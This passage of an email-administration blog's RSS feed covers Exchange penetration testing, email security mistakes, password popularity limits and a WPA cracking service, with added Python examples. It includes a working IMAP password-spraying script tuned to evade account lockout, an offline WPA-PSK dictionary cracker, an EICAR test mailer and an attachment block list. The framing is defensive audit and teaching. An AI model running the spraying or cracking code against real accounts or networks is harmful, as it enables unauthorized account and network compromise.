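EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"


def zipped(name, data, depth=1):
    """Wrap `data` (stored as `name`) inside `depth` nested zip archives."""
    for level in range(depth):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            zf.writestr(name, data)
        data, name = buf.getvalue(), "level%d.zip" % (level + 1)
    return data


VARIANTS = {
    "plain": ("eicar.com", "application/octet-stream", EICAR),
    "zip": ("eicar.zip", "application/zip", zipped("eicar.com", EICAR)),
    "nested-zip": ("eicar-nested.zip", "application/zip", zipped("eicar.com", EICAR, depth=2)),
}


def build_test_message(sender, recipient, variant):
    """EmailMessage with the chosen EICAR packaging as its attachment."""
    filename, content_type, payload = VARIANTS[variant]
    maintype, subtype = content_type.split("/")
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = "Gateway AV test: %s" % variant
    msg.set_content("Filter test. The attachment is the EICAR test file, not malware.")
    msg.add_attachment(payload, maintype=maintype, subtype=subtype, filename=filename)
    return msg


def attachment_bytes(msg):
    """Raw bytes of the message's first attachment, for verifying what was sent."""
    for part in msg.iter_attachments():
        return part.get_payload(decode=True)
    return None


if __name__ == "__main__":
    # Assumed addresses and relay; the gateway should block or strip all three.
    for variant in VARIANTS:
        msg = build_test_message("avtest@example.com", "av-sink@example.com", variant)
        with smtplib.SMTP("mail.example.com", 25) as smtp:
            smtp.send_message(msg)
        print("sent", variant, "(%d bytes attached)" % len(attachment_bytes(msg)))
```

<p>The interesting result is usually not the bare file, which every scanner catches, but the nested archive: a gateway that only unpacks one level, or gives up on archives above a size or depth limit, will let it through, and that is the behaviour a real sample would exploit.</p>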
<p><strong>Brute Force Password Hacking</strong></p>
<p>A brute force password attack entails repeatedly logging into an account with different candidate passwords, and is a strategy employed by attackers looking for soft targets on the Internet.  Unlike cracking a stolen password hash file or database, guessing passwords online as part of a penetration test is a lower-risk proposition in that no credential store has to be extracted or handled; the main hazard is locking out legitimate users, so it is viable only if care is taken to stay under the account lockout threshold.</p>
<p>Moreover, this is a good way of weeding out easy-to-guess passwords that some employees may be using, and it is an activity that can be conducted when server and network utilization is lower (such as overnight or over the weekend).  Dictionary files in your company's native language can be compiled relatively easily, or downloaded from various repositories on the Internet.  Finally, there is no need to find a tool dedicated to breaking into Exchange Server, since any password brute force tool that supports POP or IMAP can be pointed at it.  While you are at it, confirm that the attempts show up in your logs, because a real attacker will be doing exactly the same thing.</p>
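<p>What such a tool does, with the pacing a lockout policy forces on it, as an added example that is not from the article: the host, the account names, the wordlist and the lockout values are assumptions. Each password is tried across every account before the next one is attempted, and the planner waits out a full lockout observation window whenever the next pass would push any account to its failure threshold.</p>

```python
"""Online password audit over IMAP, paced to stay under account lockout.

Added example, not from the original article; any IMAP-capable brute-force
tool does the same job. The host, the account names, the wordlist and the
lockout policy values are assumptions for illustration. Each password is
tried across every account before the next one, and the planner pauses for
a full lockout observation window whenever the next pass would push an
account to its failure threshold.
"""
import imaplib
import time


def plan_attempts(users, passwords, lockout_threshold, window_seconds):
    """Return [(delay_before, user, password), ...] in spray order.

    No account is tried more than lockout_threshold - 1 times inside any
    window_seconds period: after that many passes over the user list the
    plan waits out a whole window before continuing.
    """
    per_user_budget = max(1, lockout_threshold - 1)
    plan = []
    for i, password in enumerate(passwords):
        delay = window_seconds if i and i % per_user_budget == 0 else 0
        for j, user in enumerate(users):
            plan.append((delay if j == 0 else 0, user, password))
    return plan


def try_login(host, user, password, port=993):
    """True if user/password opens an IMAP session on host.

    A network error is left to propagate: an unreachable server must stop
    the run rather than be recorded as a thousand wrong passwords.
    """
    conn = imaplib.IMAP4_SSL(host, port)
    try:
        conn.login(user, password)
        return True
    except imaplib.IMAP4.error:
        return False
    finally:
        try:
            conn.logout()
        except (imaplib.IMAP4.error, OSError):
            pass


def run_audit(host, users, passwords, lockout_threshold=5, window_seconds=15 * 60):
    """Try the plan against host; return {user: password} for accounts that opened."""
    found = {}
    for delay, user, password in plan_attempts(users, passwords, lockout_threshold, window_seconds):
        if user in found:
            continue
        if delay:
            time.sleep(delay)
        if try_login(host, user, password):
            found[user] = password
    return found


if __name__ == "__main__":
    # Assumed values; in practice read the account list and wordlist from files.
    USERS = ["alice", "bob", "carol"]
    WORDS = ["Password1", "Welcome1", "Summer2011", "Exchange2010"]
    print(run_audit("mail.example.com", USERS, WORDS))
```

<p>With a threshold of five failures in fifteen minutes, a thousand accounts and a hundred-word list, the plan needs about 25 windows, a little over six hours, which is why the article suggests running it overnight; it is also why the same pattern from an unknown address in your logs deserves attention.</p>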
<p>Are you aware of any simple penetration testing strategies that can be used to test the robustness of an Exchange Server deployment?  Feel free to highlight them in the comments section below.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.theemailadmin.com/2011/06/simple-penetration-testing-strategies-for-your-exchange-server/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>5 Simple Mistakes When it Comes to Email Security</title>
		<link>http://www.theemailadmin.com/2011/06/5-simple-mistakes-when-it-comes-to-email-security/</link>
		<comments>http://www.theemailadmin.com/2011/06/5-simple-mistakes-when-it-comes-to-email-security/#comments</comments>
		<pubDate>Mon, 13 Jun 2011 16:01:46 +0000</pubDate>
		<dc:creator>Jeff Orloff</dc:creator>
				<category><![CDATA[Compliance]]></category>
		<category><![CDATA[Email archiving & storage]]></category>
		<category><![CDATA[email management]]></category>
		<category><![CDATA[email security]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[backups]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[email archiving]]></category>
		<category><![CDATA[email compliance]]></category>
		<category><![CDATA[email encryption]]></category>
		<category><![CDATA[email policies]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[password protection]]></category>
		<category><![CDATA[passwords]]></category>

		<guid isPermaLink="false">http://www.theemailadmin.com/?p=4127</guid>
		<description><![CDATA[In just one week Google, the International Monetary Fund and Citigroup have all made headlines as a result of email associated with them being under attack. The reason we continue to see companies make the news as a result of email attacks is that email security is sometimes ignored when it comes to training users [...]
]]></description>
			<content:encoded><![CDATA[
<p><img class="alignright size-full wp-image-4128" style="margin: 10px; border: black 0px solid;" src="http://www.theemailadmin.com/wp-content/uploads/2011/06/email_security.jpg" alt="email_security" width="263" height="257" />In just one week Google, the International Monetary Fund and Citigroup have all made headlines as a result of email associated with them being under attack. The reason we continue to see companies make the news as a result of email attacks is that email security is sometimes ignored when it comes to training users properly and making good decisions. In some cases, having the latest and greatest when it comes to security tools even creates a false sense of security that causes us, and our users, to overlook the little things. A multi-layered defense that has been properly configured with all the best technology can be rendered useless if the little things are forgotten.</p>
<p><span id="more-4127"></span></p>
<p>This list displays some of the most common mistakes that are made when it comes to email security and a brief description of what you can do to prevent them.</p>
<p><strong>Leaky emails</strong></p>
<p>There are many times when sensitive information is passed along via email. If everything is encrypted properly you, and your users, often assume that it will only be seen by the appropriate people. Unfortunately this isn’t always the case. Too many times a recipient may answer an email with sensitive information and hit the <em>reply all</em> button without checking to see who will be receiving the email.</p>
<p><em>The fix: Put a policy in place that addresses sensitive emails and reply to emails. However a policy alone isn’t enough. Make users aware of the policy through training and keep a record that all users were trained/informed of the policy and repercussions of not adhering to it.</em></p>
<p><strong>Trusting others</strong></p>
<p>When we receive email from family, friends and business colleagues we often open it without much concern, especially when it comes from contacts we communicate with regularly. Yet a sender address is trivially forged, a compromised contact's account sends from the genuine address, and malware spreads easily through email by attachment, embedded code and links.</p>
<p><em>The fix: HTML in email should be blocked if this is a concern, as should your users' ability to receive attachments that are scripts or executable files. Filter on what a file actually is, not just on its extension, and look inside archives, since a renamed or zipped executable is the standard way around a naive filter.</em></p>
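<p>A filter implementing that fix, as an added example that is not from the original article: it parses a raw message, flags attachments by a blocked-extension list and by the leading bytes that identify executable content, walks into zip archives (to a depth limit, and noting encrypted entries it cannot inspect) and optionally flags an HTML body. The extension list, the depth limit and the sample messages are constructed for illustration.</p>

```python
"""Block an incoming message's dangerous attachments: scripts and executables,
including ones renamed or hidden inside a zip, plus an optional HTML check.

Added example, not from the original article. The checks combine a filename
blocklist with a look at the file's leading bytes, because an .exe renamed
to .txt is still an executable. The blocklist, the nesting limit and the
sample messages are constructed for illustration.
"""
import io
import os
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

BLOCKED_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js",
               ".jse", ".wsf", ".ps1", ".hta", ".msi", ".dll", ".jar"}
MAX_ZIP_DEPTH = 3  # refuse archives nested deeper than this (evasion, zip bombs)
# Leading bytes of Windows PE, ELF, 64-bit Mach-O and Java class / Mach-O fat
# binaries, plus the shebang that starts a Unix script.
EXEC_MAGIC = (b"MZ", b"\x7fELF", b"\xcf\xfa\xed\xfe", b"\xca\xfe\xba\xbe", b"#!")


def looks_executable(data):
    """True if the content is executable code, whatever the file is called."""
    return data.startswith(EXEC_MAGIC)


def check_blob(name, data, depth=0):
    """Return the reasons (possibly none) that attachment `name` should be blocked."""
    reasons = []
    if os.path.splitext(name.lower())[1] in BLOCKED_EXT:
        reasons.append("%s: blocked extension" % name)
    if looks_executable(data):
        reasons.append("%s: executable/script content" % name)
    if data.startswith(b"PK\x03\x04"):  # zip local file header
        if depth >= MAX_ZIP_DEPTH:
            return reasons + ["%s: zip nested deeper than %d" % (name, MAX_ZIP_DEPTH)]
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    entry = "%s!%s" % (name, info.filename)
                    if info.flag_bits & 0x1:  # encrypted entry: cannot inspect it
                        reasons.append("%s: encrypted zip entry" % entry)
                    else:
                        reasons.extend(check_blob(entry, zf.read(info), depth + 1))
        except zipfile.BadZipFile:
            reasons.append("%s: corrupt zip" % name)
    return reasons


def check_message(raw_bytes, block_html=True):
    """Parse a raw RFC 5322 message; return every reason to reject it."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_bytes)
    reasons = []
    for part in msg.walk():
        if part.is_attachment():
            name = part.get_filename() or "(unnamed)"
            reasons.extend(check_blob(name, part.get_payload(decode=True) or b""))
        elif block_html and part.get_content_type() == "text/html":
            reasons.append("inline HTML body")
    return reasons


def sample_message(filename, data, html=False):
    """Constructed test message with one attachment (not a real capture)."""
    m = EmailMessage()
    m["From"] = "friend@example.com"
    m["To"] = "you@example.com"
    m["Subject"] = "Invoice attached"
    m.set_content("Please see the attached file.")
    if html:
        m.add_alternative("<p>Please see the <b>attached</b> file.</p>", subtype="html")
    m.add_attachment(data, maintype="application", subtype="octet-stream", filename=filename)
    return m.as_bytes()


if __name__ == "__main__":
    print(check_message(sample_message("report.pdf", b"%PDF-1.4\n")))
    print(check_message(sample_message("notes.txt", b"MZ\x90\x00" + b"\x00" * 60)))
```

<p>An encrypted zip entry is reported rather than passed, because a filter that cannot look inside an archive should not vouch for it; whether to quarantine or merely log such messages is a policy choice for the organization.</p>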
<p><strong>Passwords that are easy to guess</strong></p>
<p>Remember when Sarah Palin's personal email account was breached? The attacker didn't guess her password; he walked through the password reset process and answered her security questions (birth date, ZIP code, where she met her spouse) with facts found on Wikipedia and through a search engine. Companies often publish enough information on corporate sites to let attackers guess passwords or reset answers in the same way.</p>
<p><em>The fix: Enforce strong passwords or passphrases for all users, and treat password reset questions as passwords too, not as trivia. Make sure that people don't give up information in published bios that could be used to guess either.</em></p>
<p><strong>Ignoring malware protection on the desktop</strong></p>
<p>While scanning all emails for malware needs to be done, the desktop should not be ignored. And all too often it is. Malware definitions are outdated, software is not configured to run properly or protection is completely left to the user.</p>
<p>Even if you have a policy that enforces strong passwords, a keystroke logger can easily give up even the most complex password combination.</p>
<p><em>The fix: Email administrators should work closely with IT security to make sure that the desktop and network security isn’t lax so passwords are tougher to expose.</em></p>
<p><strong>Failing to check on backups</strong></p>
<p>Some companies and industries are required, by law, to back up and archive emails for a set period of time. Others are not required to do so. Regardless of the laws, every person and company should be in the practice of backing up emails. Emails often provide important records and information that could be lost.</p>
<p>But what happens if you need to restore your emails and find that something went wrong? Maybe the backup was incorrectly configured or the backup location was insecure. In any event, the inability to restore emails from a backup can render the entire solution useless.</p>
<p><em>The fix: Frequently test the ability of your backup solution, and staff, to restore emails.</em></p>
<p>These five tips may seem basic and simple. But that is the point. Working in IT we often gravitate towards the more complex issues and ignore simple techniques and solutions until it is too late. By taking the time to do the little things when it comes to security, we build an even stronger foundation for all the bells, whistles and technologies that really impress us and our bosses.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.theemailadmin.com/2011/06/5-simple-mistakes-when-it-comes-to-email-security/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>How to choose a password according to Microsoft</title>
		<link>http://www.theemailadmin.com/2010/07/how-to-choose-a-password-according-to-microsoft/</link>
		<comments>http://www.theemailadmin.com/2010/07/how-to-choose-a-password-according-to-microsoft/#comments</comments>
		<pubDate>Fri, 30 Jul 2010 13:24:28 +0000</pubDate>
		<dc:creator>John P Mello Jr</dc:creator>
				<category><![CDATA[email security]]></category>
		<category><![CDATA[password protection]]></category>
		<category><![CDATA[passwords]]></category>

		<guid isPermaLink="false">http://www.theemailadmin.com/?p=2736</guid>
		<description><![CDATA[Passwords are a necessary evil for system security, but they need not be as evil as some organizations require them to be. Even “trivial” passwords can be secure, if their system-wide use is policed. That’s the conclusion of a pair of Microsoft researchers and a Harvard computer science professor reached in a paper expected to [...]
]]></description>
			<content:encoded><![CDATA[
<p><img class="alignright size-full wp-image-2740" style="margin: 10px; border: 0px;" src="http://www.theemailadmin.com/wp-content/uploads/2010/07/password-300.jpg" alt="password 300" width="300" height="220" /></p>
<p>Passwords are a necessary evil for system security, but they need not be as evil as some organizations require them to be. Even “trivial” passwords can be secure, if their system-wide use is policed.</p>
<p>That’s the conclusion a pair of Microsoft researchers and a Harvard computer science professor reach in a paper to be presented at the <a target="_blank" href="http://www.usenix.org/events/hotsec10/tech/">Hot Topics in Security workshop</a> in Washington, D.C. next month. The trio&#8211;Stuart Schechter, Cormac Herley and Prof. Michael Mitzenmacher&#8211;maintain that users can be allowed to choose simple passwords as long as too many of them aren’t allowed to choose the same one.</p>
<blockquote><p>“We propose to strengthen user-selected passwords against statistical-guessing attacks by allowing users of Internet-scale systems to choose any password they want&#8211;so long as it&#8217;s not already too popular with other users,” they write in <a target="_blank" href="http://research.microsoft.com/pubs/132859/popularityISeverything.pdf"><em>Popularity Is Everything: A New Approach to Protecting Passwords from Statistical-Guessing Attacks</em></a>.</p></blockquote>
<p>One reason organizations impose password creation rules is to protect their users from brute force “dictionary” attacks. If a password can be found in a dictionary, then sooner or later a hacker will crack it. Passwords made up of non-words can foil such attacks. Passwords made up of hellacious combinations of upper- and lowercase letters, numbers and symbols are better yet. The problem for users, though, is that, for most of them, the most secure passwords are the hardest to remember.</p>
<p>Rather than try to change user behavior&#8211;which, left alone, is to damn security and choose as simple a password as possible&#8211;security pros often deploy a “three strikes and you’re out” lockout system to foil mass guessing. With that system, if a password is entered incorrectly three times, the account is locked for a period of time. Attackers, who are great students of human behavior, quickly figured out a workaround to lockout schemes, and it has to do with how users choose passwords.</p>
<p><span id="more-2736"></span>In an <a target="_blank" href="http://www.theemailadmin.com/2010/02/survey-identifies-worst-password-practices/">analysis</a> of some 32 million pilfered passwords performed earlier this year by a security firm, 60 percent of users had chosen passwords from a limited set of alphanumeric characters, and 50 percent of the passwords were names, slang, dictionary words or trivial strings such as 123456 or “Password.” Attackers are well aware of those tendencies. So rather than directing thousands of attempts at one account, they take the most common passwords and direct each of them at thousands of accounts, a technique now usually called password spraying. Not only does that skirt per-account lockouts, since each account sees only a handful of failures, but it is far more efficient than a brute force dictionary attack.</p>
<p>That kind of common password attack, though, can be blunted by adopting the methods proposed by the authors of <em>Popularity Is Everything</em>. Their system calls for limiting the number of times a particular password can be used. So even if an intruder guesses a correct password, he or she would only be able to compromise a handful of accounts at the most.</p>
<blockquote><p>“Replacing password creation rules with popularity limits has the potential to increase both security and usability,” the researchers contend in their paper. “Since no passwords are allowed to become too common, attackers are deprived of the popular passwords they require to compromise a significant fraction of accounts using online guessing.”</p></blockquote>
<blockquote><p>“We conjecture that usability also increases,” they continue. “System designers no longer need to create increasingly complex password-selection rules with no guarantee that they will result in truly strong passwords. Users needn&#8217;t read, learn, or interpret these rules. Instead, users are only inconvenienced when their password choice is one that would lead to a [quantifiable] unacceptable level of vulnerability to a statistical guessing attack.”</p></blockquote>
<p>Although the password philosophy advocated by the researchers has yet to undergo close scrutiny from the security community, steering users away from common passwords has gained some traction at one of the largest social networks on the Internet.</p>
<blockquote><p>“Twitter, in responding to an <a target="_blank" href="http://www.wired.com/threatlevel/2009/01/professed-twitt/">online password guessing attack</a> that exploited their failure to lock out guessers, now forbids 390 of the most common passwords,” the researchers noted. “It would appear that Twitter decided that this inconveniences their users less than the introduction of cumbersome password policies.”</p></blockquote>
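<p>The mechanism the paper proposes is a count-min sketch over the passwords users pick: a few rows of counters indexed by keyed hashes, which can over-count but never under-count, so a password that has become popular can never be mistaken for a rare one. The class below is an added example implementing that idea, not the authors' code. The sketch dimensions, the popularity cap, the secret hash key and the short static deny list (standing in for Twitter's list of banned passwords) are assumptions.</p>

```python
"""Popularity-limited password acceptance using a count-min sketch, the data
structure the paper proposes. Added example, not the authors' code. The
sketch dimensions, the popularity cap, the secret key and the short static
deny list (standing in for Twitter's list of banned passwords) are
assumptions.

The sketch holds only counters, never the passwords, so a stolen copy
reveals far less than a table of (password, count) pairs would, and a
lookup never under-counts, so a popular password cannot slip through.
"""
import hashlib


class PopularityOracle:
    def __init__(self, width=1 << 18, depth=4, max_share=1e-6, min_count=3,
                 key=b"assumed-secret-key", banned=()):
        self.width, self.depth = width, depth
        self.max_share = max_share   # fraction of all accounts one password may hold
        self.min_count = min_count   # absolute floor while the user base is small
        self.key = key               # keyed hash: outsiders cannot craft collisions
        self.total = 0               # accounts recorded
        self.table = [[0] * width for _ in range(depth)]
        self.banned = set(banned)

    def _buckets(self, password):
        data = password.encode("utf-8")
        for row in range(self.depth):
            digest = hashlib.blake2b(data, key=self.key, digest_size=8,
                                     person=b"row%d" % row).digest()
            yield row, int.from_bytes(digest, "big") % self.width

    def record(self, password):
        """Call when an account starts using `password`."""
        self.total += 1
        for row, col in self._buckets(password):
            self.table[row][col] += 1

    def forget(self, password):
        """Call when an account stops using `password` (the server sees the
        old password at change time, so the count can be decremented)."""
        self.total -= 1
        for row, col in self._buckets(password):
            self.table[row][col] -= 1

    def estimate(self, password):
        """Accounts using `password`: possibly over-, never under-counted."""
        return min(self.table[row][col] for row, col in self._buckets(password))

    def limit(self):
        """Current popularity cap in accounts."""
        return max(self.min_count, self.max_share * self.total)

    def is_allowed(self, password):
        """The policy: anything goes unless it is banned or already too popular."""
        return password not in self.banned and self.estimate(password) < self.limit()


if __name__ == "__main__":
    oracle = PopularityOracle(banned=["password", "123456", "qwerty"])
    for pw in ["Tr0ub4dor&3"] * 3 + ["correct horse battery staple"]:
        oracle.record(pw)
    for pw in ["Tr0ub4dor&3", "correct horse battery staple", "qwerty"]:
        print(pw, "allowed" if oracle.is_allowed(pw) else "rejected")
```

<p>Because the sketch can only over-count, the occasional false rejection inconveniences one user choosing an unlucky string, whereas a false acceptance is impossible by construction; that asymmetry is what makes a few megabytes of counters a safe substitute for storing every password in the clear.</p>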
]]></content:encoded>
			<wfw:commentRss>http://www.theemailadmin.com/2010/07/how-to-choose-a-password-according-to-microsoft/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Act like a hacker with WPA Cracker</title>
		<link>http://www.theemailadmin.com/2010/01/act-like-a-hacker-with-wpa-cracker/</link>
		<comments>http://www.theemailadmin.com/2010/01/act-like-a-hacker-with-wpa-cracker/#comments</comments>
		<pubDate>Wed, 13 Jan 2010 14:50:18 +0000</pubDate>
		<dc:creator>John P Mello Jr</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[password cracking]]></category>
		<category><![CDATA[password protection]]></category>
		<category><![CDATA[WiFi]]></category>

		<guid isPermaLink="false">http://www.theemailadmin.com/?p=1992</guid>
		<description><![CDATA[Does the security of your company&#8217;s WiFi networks keep you awake at night? Would you like to test the strength of the passwords to that network but can&#8217;t afford to tie up a computer for days or weeks to do it? Then a new service called WPA Cracker might be for you. The recently launched [...]
]]></description>
			<content:encoded><![CDATA[
<p><img class="alignright size-full wp-image-2002" src="http://www.theemailadmin.com/wp-content/uploads/2009/12/wpa-cracker1.jpg" alt="wpa cracker1" width="250" height="137" />Does the security of your company&#8217;s WiFi networks keep you awake at night? Would you like to test the strength of the passwords to that network but can&#8217;t afford to tie up a computer for days or weeks to do it? Then a new service called <a target="_blank" href="http://www.wpacracker.com/index.html">WPA Cracker</a> might be for you.</p>
<p>The recently launched pay-as-you-go service is aimed at &#8220;penetration testers.&#8221; It links some 400 computers in &#8220;the cloud&#8221; to accomplish in minutes what would take days or weeks for a single desktop or laptop.</p>
<p>Designed to crack WPA or WPA2 passphrases where a pre-shared key (PSK) is used, the service runs dictionary attacks against a captured four-way handshake that the customer uploads. It will also crack passwords on zip archives.</p>
<p>The main dictionary used by the service contains 135 million English candidate passphrases tailored to WPA/WPA2 networks. In addition, there&#8217;s a 284 million word extended dictionary and a 100 million entry digit dictionary. The extended dictionary is not a superset of the standard one: words in the extended dictionary are not found in the standard one. The digit dictionary covers every eight-digit number, eight characters being the shortest passphrase WPA allows. Each dictionary can be run against a network separately or in aggregate as a mammoth 520 million password resource. A German dictionary is also offered by the service.</p>
<p><span id="more-1992"></span>Unlike the dictionary approach to WPA cracking, the service&#8217;s Zip cracking feature is a brute force attack. It will try every variation of a character set on the maximum length of a password. Attacks on other file types are planned for the future, according to the service&#8217;s Web site.</p>
<p>For pricing purposes, the entire cloud cluster can be deployed or a half set of it. The half cluster option, which takes about 40 minutes to run, costs $17. For a full cluster attack, which takes about 20 minutes to run, the cost is $35. Similar assaults would take an average of five days if run from a single desktop computer, longer if launched from a notebook computer, according to the service.</p>
<p>Zip file attacks range from $34 to $102, depending on character set and password length.</p>
<p>Payments are made through Amazon Payments and are due whether or not a password is cracked. Of course, the sense of security a network administrator may feel when the service fails to break into his or her wireless network may be worth the price of failure, with one caveat: a miss only shows that the passphrase is not in those dictionaries, not that it would survive a larger or more targeted wordlist.</p>
<p>There are a number of free alternatives to WPA Cracker. &#8220;<a target="_blank" href="http://en.wikipedia.org/wiki/Rainbow_table" onclick="pageTracker._trackPageview('/outgoing/en.wikipedia.org/wiki/Rainbow_table?referer=');">Rainbow Tables</a>,&#8221; for example, abound on the Internet&#8211;most notably at the <a target="_blank" href="http://www.churchofwifi.org/default.asp?PageLink=Project_Display.asp?PID=90" onclick="pageTracker._trackPageview('/outgoing/www.churchofwifi.org/default.asp?PageLink=Project_Display.asp?PID=90&amp;referer=');">Church of WiFi</a>. Although those tables speed up password attacks, each one is tied to a single network ESSID: WPA derives the key from the passphrase with PBKDF2 using the ESSID as the salt, so a table precomputed for one ESSID is useless against any other. Although thousands of tables have been created for the most common ESSIDs, if your network doesn&#8217;t have an ESSID for which a corresponding table has been created, then you&#8217;re out of luck. What&#8217;s more, when WPA is enabled on a network, the ESSID is often changed from the out-of-the-box default to something less common.</p>
<p>Another drawback to free alternatives is that their dictionaries are substantially smaller than the ones used by WPA Cracker. The <a target="_blank" href="http://www.openwall.com/" onclick="pageTracker._trackPageview('/outgoing/www.openwall.com/?referer=');">Openwall Project</a>, for instance, offers a free dictionary of some four million entries in over 20 languages&#8211;including Afrikaans, Croatian, Czech, Danish, Dutch, English, Finnish, French, German, Hungarian, Italian, Japanese, Latin, Norwegian, Polish, Russian, Spanish, Swahili, Swedish, Turkish, and Yiddish&#8211;that can be used with programs like John the Ripper. For $28.25, the Project offers a CD with a larger list of some 40 million entries. It includes word mangling rules to discover passwords where capitalization or digits have been added to words. However, according to WPA Cracker, those dictionaries are better at cracking Unix passwords than they are at discovering WPA passphrases. The dictionaries in WPA Cracker, the service maintains, are built from word combinations, phrases, numbers, symbols and leetspeak (letters swapped for look-alike digits and symbols) that have proven successful in attacks on WPA passphrases.</p>
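<p>To make the ESSID-as-salt point and the per-candidate cost concrete, here is an added example (not code from the original post or from the WPA Cracker service) that derives the WPA-PSK Pairwise Master Key exactly as IEEE 802.11i specifies and runs a dictionary attack against it. The target is built from the standard&#8217;s published test vector (passphrase "password", SSID "IEEE") rather than from a real capture, the wordlist is constructed, and the handshake capture and MIC check of a real attack are left out.</p>

```python
"""WPA/WPA2-PSK dictionary attack, reduced to the step that costs the money.

Added example, not code from the original post or from the WPA Cracker
service.  The key derivation is the real one from IEEE 802.11i:
    PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)
The target stands in for a captured network and the wordlist is constructed,
so the script runs offline.  A real attack checks each candidate PMK against
the MIC in a captured four-way handshake; that capture and check are left out.
"""
import hashlib
import hmac
import time

# IEEE 802.11i published test vector: passphrase "password", SSID "IEEE".
IEEE_TEST_PASSPHRASE = "password"
IEEE_TEST_SSID = "IEEE"
IEEE_TEST_PMK_HEX = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key for WPA-PSK.  The ESSID is the PBKDF2 salt, which is
    why a precomputed (rainbow) table is only valid for the ESSID it was built with."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, dklen=32)


def dictionary_attack(target_pmk: bytes, ssid: str, candidates):
    """Return the first candidate whose PMK matches the target, or None.

    Each candidate costs a full PBKDF2 run (2 x 4096 HMAC-SHA1 blocks, because
    a 32-byte key needs two 20-byte SHA-1 outputs).  That per-guess cost, not
    the comparison, is what the 400-host cluster is parallelising.
    """
    for candidate in candidates:
        if hmac.compare_digest(derive_pmk(candidate, ssid), target_pmk):
            return candidate
    return None


def guesses_per_second(samples: int = 20) -> float:
    """Rough single-core rate, to put the service's 'five days' figure in context."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"benchmark{i}", "benchmark-ssid")
    return samples / (time.perf_counter() - start)


# Constructed wordlist standing in for the service's dictionaries.
CONSTRUCTED_WORDLIST = ["letmein1", "12345678", "sunshine", "password", "p@ssw0rd"]

if __name__ == "__main__":
    target = derive_pmk(IEEE_TEST_PASSPHRASE, IEEE_TEST_SSID)  # plays the captured network
    print("PMK matches the 802.11i vector:", target.hex() == IEEE_TEST_PMK_HEX)
    print("recovered passphrase:", dictionary_attack(target, IEEE_TEST_SSID, CONSTRUCTED_WORDLIST))
    # Same wordlist, same passphrase in it, different ESSID: nothing matches.
    print("same wordlist vs ESSID 'OtherNet':", dictionary_attack(target, "OtherNet", CONSTRUCTED_WORDLIST))
    rate = guesses_per_second()
    print(f"about {rate:.0f} candidates/s on one core; the 135M-word dictionary is about "
          f"{135e6 / rate / 86400:.1f} days of single-core time")
```

<p>Run it and note the single-core rate: at 4096 PBKDF2 iterations per candidate, the 135 million word main dictionary is days of CPU time on one machine, which is the gap the 400-node cluster closes. Trying the same wordlist against a second ESSID finds nothing even though the passphrase is in the list, which is exactly why a rainbow table built for one ESSID cannot be reused for another.</p>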
<p>&#8220;Security is moving into the cloud &#8230; so the attacks will follow security into the cloud as well,&#8221; WPA Cracker&#8217;s creator Moxie Marlinspike told MIT&#8217;s Technology Review. &#8220;Password cracking is an obvious thing. Normally, it is cost-prohibitive to run CPU-intensive jobs. [With cloud computing] it costs a lot less money than doing it yourself.&#8221;</p>
<span id="pty_trigger"></span><p><a href="http://www.theemailadmin.com/2010/01/act-like-a-hacker-with-wpa-cracker/">Act like a hacker with WPA Cracker</a><br/><br/>

Free ebook download: <a href="http://www.theemailadmin.com/ebook/Top-10-Most-Popular-Troubleshooting-Posts-for-Email-Administrators.pdf">Top 10 Most Popular Troubleshooting Posts for Email Administrators</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.theemailadmin.com/2010/01/act-like-a-hacker-with-wpa-cracker/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Physical protection of passwords and sensitive information</title>
		<link>http://www.theemailadmin.com/2009/11/physical-protection-of-passwords-and-sensitive-information/</link>
		<comments>http://www.theemailadmin.com/2009/11/physical-protection-of-passwords-and-sensitive-information/#comments</comments>
		<pubDate>Thu, 05 Nov 2009 09:53:51 +0000</pubDate>
		<dc:creator>Dan Blacharski</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[identity theft]]></category>
		<category><![CDATA[password protection]]></category>

		<guid isPermaLink="false">http://www.theemailadmin.com/?p=1667</guid>
		<description><![CDATA[IT departments often take the time to be proactive (at least if they&#8217;re doing their jobs), and educate staff about using complex passwords, changing passwords frequently, avoiding phishing by not clicking on unknown email links and attachments, and all the other standard protections we know to take. But we sometimes forget that amidst all the [...]
]]></description>
			<content:encoded><![CDATA[
<p><img class="alignright size-medium wp-image-1780" style="margin: 10px;" title="Password protection" src="http://www.theemailadmin.com/wp-content/uploads/2009/11/Choosing-a-password-300x200.jpg" alt="Password protection" width="300" height="200" />IT departments often take the time to be proactive (at least if they&#8217;re doing their jobs), and educate staff about using complex passwords, changing passwords frequently, avoiding phishing by not clicking on unknown email links and attachments, and all the other standard protections we know to take. But we sometimes forget that amidst all the technical precautions, we must also take physical precautions.</p>
<p>Passwords, PINs, and other sensitive information often arrive in printed form before we commit them to memory: a letter from a bank, a memo from the IT department, or a password we wrote down on a piece of paper and stuck in a drawer. What happens to this paper? More often than not, it gets tossed into the waste bin, where it can be easily picked through by an opportunistic identity thief.</p>
